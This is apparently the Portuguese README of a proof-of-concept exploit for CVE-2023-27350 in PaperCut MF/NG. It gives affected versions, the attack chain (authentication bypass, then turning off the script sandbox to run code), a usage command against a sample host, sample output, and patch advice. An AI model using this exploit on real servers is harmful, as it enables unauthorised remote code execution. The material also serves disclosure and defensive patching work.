
Vulnerabilidade do Papercut, as versões afetadas são PaperCut MF ou NG versão 8.0 ou posterior (excluindo versões corrigidas) em todas as plataformas de SO.
POC para CVE-2023-27350 afetando PaperCut MF/NG
##Versões Afetadas 'PaperCut MF ou NG versão 8.0 ou posterior (excluindo versões corrigidas) em todas as plataformas de SO.'
Este POC usa uma vulnerabilidade de bypass de autenticação encadeada com abuso da funcionalidade de script embutido para executar código.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Atualize para a versão mais recente ou mitigue seguindo as instruções no PaperCut Security Advisory
Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis ou responsabilizáveis pelo uso indevido do software. Use com responsabilidade.